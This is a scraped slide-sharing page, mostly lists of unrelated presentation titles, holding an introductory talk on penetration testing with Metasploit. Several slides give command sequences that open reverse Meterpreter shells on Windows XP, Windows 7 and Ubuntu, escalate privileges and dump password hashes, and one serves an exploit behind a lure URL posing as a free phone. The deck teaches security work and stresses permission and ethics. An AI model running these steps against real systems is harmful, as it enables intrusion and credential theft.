Cyaniclab : Software Development Agency Portfolio.pdf
Cyanic lab
 
Orion Context Broker introduction 20240604
Orion Context Broker introduction 20240604Orion Context Broker introduction 20240604
Orion Context Broker introduction 20240604
Fermin Galan
 
Globus Compute Introduction - GlobusWorld 2024
Globus Compute Introduction - GlobusWorld 2024Globus Compute Introduction - GlobusWorld 2024
Globus Compute Introduction - GlobusWorld 2024
Globus
 
Vitthal Shirke Microservices Resume Montevideo
Vitthal Shirke Microservices Resume MontevideoVitthal Shirke Microservices Resume Montevideo
Vitthal Shirke Microservices Resume Montevideo
Vitthal Shirke
 
BoxLang: Review our Visionary Licenses of 2024
BoxLang: Review our Visionary Licenses of 2024BoxLang: Review our Visionary Licenses of 2024
BoxLang: Review our Visionary Licenses of 2024
Ortus Solutions, Corp
 
Developing Distributed High-performance Computing Capabilities of an Open Sci...
Developing Distributed High-performance Computing Capabilities of an Open Sci...Developing Distributed High-performance Computing Capabilities of an Open Sci...
Developing Distributed High-performance Computing Capabilities of an Open Sci...
Globus
 
Exploring Innovations in Data Repository Solutions - Insights from the U.S. G...
Exploring Innovations in Data Repository Solutions - Insights from the U.S. G...Exploring Innovations in Data Repository Solutions - Insights from the U.S. G...
Exploring Innovations in Data Repository Solutions - Insights from the U.S. G...
Globus
 
Prosigns: Transforming Business with Tailored Technology Solutions
Prosigns: Transforming Business with Tailored Technology SolutionsProsigns: Transforming Business with Tailored Technology Solutions
Prosigns: Transforming Business with Tailored Technology Solutions
Prosigns
 

Recently uploaded (20)

Enhancing Project Management Efficiency_ Leveraging AI Tools like ChatGPT.pdf
Enhancing Project Management Efficiency_ Leveraging AI Tools like ChatGPT.pdfEnhancing Project Management Efficiency_ Leveraging AI Tools like ChatGPT.pdf
Enhancing Project Management Efficiency_ Leveraging AI Tools like ChatGPT.pdf
 
AI Pilot Review: The World’s First Virtual Assistant Marketing Suite
AI Pilot Review: The World’s First Virtual Assistant Marketing SuiteAI Pilot Review: The World’s First Virtual Assistant Marketing Suite
AI Pilot Review: The World’s First Virtual Assistant Marketing Suite
 
Climate Science Flows: Enabling Petabyte-Scale Climate Analysis with the Eart...
Climate Science Flows: Enabling Petabyte-Scale Climate Analysis with the Eart...Climate Science Flows: Enabling Petabyte-Scale Climate Analysis with the Eart...
Climate Science Flows: Enabling Petabyte-Scale Climate Analysis with the Eart...
 
Navigating the Metaverse: A Journey into Virtual Evolution"
Navigating the Metaverse: A Journey into Virtual Evolution"Navigating the Metaverse: A Journey into Virtual Evolution"
Navigating the Metaverse: A Journey into Virtual Evolution"
 
RISE with SAP and Journey to the Intelligent Enterprise
RISE with SAP and Journey to the Intelligent EnterpriseRISE with SAP and Journey to the Intelligent Enterprise
RISE with SAP and Journey to the Intelligent Enterprise
 
Dominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdf
Dominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdfDominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdf
Dominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdf
 
Paketo Buildpacks : la meilleure façon de construire des images OCI? DevopsDa...
Paketo Buildpacks : la meilleure façon de construire des images OCI? DevopsDa...Paketo Buildpacks : la meilleure façon de construire des images OCI? DevopsDa...
Paketo Buildpacks : la meilleure façon de construire des images OCI? DevopsDa...
 
Corporate Management | Session 3 of 3 | Tendenci AMS
Corporate Management | Session 3 of 3 | Tendenci AMSCorporate Management | Session 3 of 3 | Tendenci AMS
Corporate Management | Session 3 of 3 | Tendenci AMS
 
GlobusWorld 2024 Opening Keynote session
GlobusWorld 2024 Opening Keynote sessionGlobusWorld 2024 Opening Keynote session
GlobusWorld 2024 Opening Keynote session
 
Globus Connect Server Deep Dive - GlobusWorld 2024
Globus Connect Server Deep Dive - GlobusWorld 2024Globus Connect Server Deep Dive - GlobusWorld 2024
Globus Connect Server Deep Dive - GlobusWorld 2024
 
2024 RoOUG Security model for the cloud.pptx
2024 RoOUG Security model for the cloud.pptx2024 RoOUG Security model for the cloud.pptx
2024 RoOUG Security model for the cloud.pptx
 
Custom Healthcare Software for Managing Chronic Conditions and Remote Patient...
Custom Healthcare Software for Managing Chronic Conditions and Remote Patient...Custom Healthcare Software for Managing Chronic Conditions and Remote Patient...
Custom Healthcare Software for Managing Chronic Conditions and Remote Patient...
 
Cyaniclab : Software Development Agency Portfolio.pdf
Cyaniclab : Software Development Agency Portfolio.pdfCyaniclab : Software Development Agency Portfolio.pdf
Cyaniclab : Software Development Agency Portfolio.pdf
 
Orion Context Broker introduction 20240604
Orion Context Broker introduction 20240604Orion Context Broker introduction 20240604
Orion Context Broker introduction 20240604
 
Globus Compute Introduction - GlobusWorld 2024
Globus Compute Introduction - GlobusWorld 2024Globus Compute Introduction - GlobusWorld 2024
Globus Compute Introduction - GlobusWorld 2024
 
Vitthal Shirke Microservices Resume Montevideo
Vitthal Shirke Microservices Resume MontevideoVitthal Shirke Microservices Resume Montevideo
Vitthal Shirke Microservices Resume Montevideo
 
BoxLang: Review our Visionary Licenses of 2024
BoxLang: Review our Visionary Licenses of 2024BoxLang: Review our Visionary Licenses of 2024
BoxLang: Review our Visionary Licenses of 2024
 
Developing Distributed High-performance Computing Capabilities of an Open Sci...
Developing Distributed High-performance Computing Capabilities of an Open Sci...Developing Distributed High-performance Computing Capabilities of an Open Sci...
Developing Distributed High-performance Computing Capabilities of an Open Sci...
 
Exploring Innovations in Data Repository Solutions - Insights from the U.S. G...
Exploring Innovations in Data Repository Solutions - Insights from the U.S. G...Exploring Innovations in Data Repository Solutions - Insights from the U.S. G...
Exploring Innovations in Data Repository Solutions - Insights from the U.S. G...
 
Prosigns: Transforming Business with Tailored Technology Solutions
Prosigns: Transforming Business with Tailored Technology SolutionsProsigns: Transforming Business with Tailored Technology Solutions
Prosigns: Transforming Business with Tailored Technology Solutions
 

Pen-Testing with Metasploit

  • 1. Pen-Testing With MetasploitBy -Mohammed Danish Amber
  • 2. AGENDA ▪ Why & What's Pen-Testing ▪ About Metasploit ▪ Metasploit Basic & Meterpreter ▪ Demo
  • 3. Mohammed Danish Amber ▪ Geek & Security Analyst ▪ Information Security Enthusiast ▪ Working in TCS ▪ Lecturer & Engineer ▪ Collaborative Project -Hacker Ecosystem ▪ Make Internet a Secure Place
  • 4. Why Pen-Testing ▪ Millions of dollars have been invested in security programs to protect critical infrastructure to prevent data breaches ▪ Penetration Test is one of the most effective ways to identify weaknesses and deficiencies in these programs
  • 5. What's Pen-Testing ▪ A method to evaluate the security of computer system / network ▪ Practice ( attacking ) an IT System like a ‘hacker’ does– Find security holes (weaknesses) – Bypass security mechanism– Compromise an organization’s IT system securityMUST HAVE PERMISSION FROM IT SYSTEM OWNERILLEGAL ACTIVITY CAN PUT YOU IN JAIL!
  • 6. ETHICS ▪ THINK BEFORE YOU ACT ▪ DON'T BE STUPID ▪ DON'T BE MALICIOUS
  • 7. PEN-TESTING PHASES INFORMATION GATHERING VULNERABILITY ANALYSIS EXPLOITATION POST EXPLOITATION REPORTING
  • 8.
  • 9. Metasploit ▪ Not Just A Tool but an entire framework ▪ An Open Source platform for writing security tools and exploits ▪ Easily build attack vectors to add it's exploits, payloads, encoders. ▪ Create and execute more advanced attack ▪ Ruby based
  • 10. Metsaploit Interface ▪ MSFconsole ▪ msfweb, msfgui (discontinued) ▪ Metasploit Pro & Community Edition ▪ Armitage
  • 13. Metasploit Terminology ▪ Exploit: Code that allow a pentester take some advantages of flaw within system,application, or service ▪ Payload: Code that we want the target system to execute (few commands to be executed on the target system) ▪ Shellcode: A set of instructions used as payload when exploitation occurs ▪ Module: A software that can be use by metasploit ▪ Listener: A component waiting for incoming connection
  • 14. How does Exploitation works Attacker Sends: Exploit + PayloadUpload + download DATA Vulnerable Server Exploit run + Payload run
  • 15. Meterpreter ▪ As a payload after vulnerability is exploited ▪ Improve the post exploitation
  • 16. Meterpreter Exploiting a vulnerability Select a meterpreter as a payload Meterpreter shell
  • 22. Windows XP Exploitation ▪ msf > search windows/smb ▪ msf > info exploit/windows/smb/ms08_067_ netapi ▪ msf > use exploit/windows/smb/ms08_067_ netapi ▪ msf exploit(ms08_067_netapi) > show payloads ▪ msf exploit(ms08_067_netapi) > set PAYLOAD ▪ windows/meterpreter/reverse_tcp ▪ msf exploit(ms08_067_netapi) > show options ▪ msf exploit(ms08_067_netapi) > set RHOST <remote ip> ▪ msf exploit(ms08_067_netapi) > set LHOST <attacker ip> ▪ msf exploit(ms08_067_netapi) > show options ▪ msf exploit(ms08_067_netapi) > exploit ▪ meterpreter > background ▪ session -l
  • 23. Windows XP Exploitation ▪ session -i 1 ▪ meterpreter > getsystem -h ▪ getuid ▪ hashdump
  • 24. Windows 7 Exploitation ▪ msf > use exploit/windows/browser/ms11_003_ie_css_import ▪ msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp ▪ msf exploit(ms11_003_ie_css_import) > show options ▪ msf exploit(ms11_003_ie_css_import) > set SRVHOST <victim ip> ▪ msf exploit(ms11_003_ie_css_import) > set SRVPORT 80 ▪ msf exploit(ms11_003_ie_css_import) > set URIPATH free_iphone6plus.exe ▪ msf exploit(ms11_003_ie_css_import) > set LHOST <victim ip> ▪ msf exploit(ms11_003_ie_css_import) > set LPORT 443 ▪ msf exploit(ms11_003_ie_css_import) > exploitJust wait until the victim open url http://<ip>:80/free_iphon6plus.exe
  • 25. Windows 7 Exploitation ▪ msf exploit(ms11_003_ie_css_import) > sessions -l ▪ msf exploit(ms11_003_ie_css_import) > sessions -i 1 ▪ meterpreter > sysinfo ▪ meterpreter > shell
  • 26. Ubuntu Exploitation ▪ search distcc ▪ use exploit/unix/misc/distcc_exec ▪ show payloads ▪ set PAYLOAD cmd/unix/reverse ▪ show options ▪ set rhost <victim ip> ▪ set lhost <attacker ip>
  • 28. Thanks To ▪ Kali / BackTrack Linux ▪ Metasploit Team (HD Moore & rapid7) ▪ Offensive Security / Metasploit Unleashed ▪ David Kennedy ▪ Georgia Weidman ▪ Null Hyderabad Chapter -CORE TEAM ▪ #nullhyd @